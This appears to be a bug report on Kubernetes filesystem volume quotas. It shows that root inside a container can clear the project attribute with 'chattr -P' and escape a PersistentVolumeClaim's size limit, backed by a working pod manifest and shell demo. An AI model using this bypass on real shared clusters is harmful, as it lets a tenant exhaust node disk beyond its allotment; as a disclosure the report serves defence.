PersistentVolume quotas can be disabled from inside a container

[jscissr]

Quotas on Filesystem volumes can simply be disabled from inside a container, by removing the project hierarchy attribute.

This means that quotas can easily be bypassed, though they are still effective against accidental excessive disk usage.

It looks like enabling user namespaces might fix this, because changing quota attributes is only allowed in the init user namespace:
https://elixir.bootlin.com/linux/v6.11.9/source/fs/ioctl.c#L608

Demo

Setup:

kubectl apply -f - <<EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: demo-claim
spec:
  accessModes:
    - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 1Mi
  storageClassName: local
---
apiVersion: v1
kind: Pod
metadata:
  name: demo-pod
  labels:
    app: demo-pod
spec:
  containers:
  - image: debian:bookworm-slim
    command: ["/bin/sleep", "1d"]
    name: debian
    volumeMounts:
      - name: demo-vol
        mountPath: /vol
  volumes:
    - name: demo-vol
      persistentVolumeClaim:
        claimName: demo-claim
EOF

kubectl exec -it demo-pod -- bash

In the container:

root@demo-pod:/# apt-get update
root@demo-pod:/# apt-get install -y gocryptfs
root@demo-pod:/# lsattr -pd /vol/
    1 -------------------P-- /vol/
root@demo-pod:/# statfs /vol
{
        "Type": 1481003842,
        "Bsize": 4096,
        "Blocks": 256,
...
root@demo-pod:/# chattr -P /vol
root@demo-pod:/# lsattr -pd /vol/
    1 ---------------------- /vol/
root@demo-pod:/# statfs /vol
{
        "Type": 1481003842,
        "Bsize": 4096,
        "Blocks": 736768,
...

After removing the P attribute, we have a lot more space.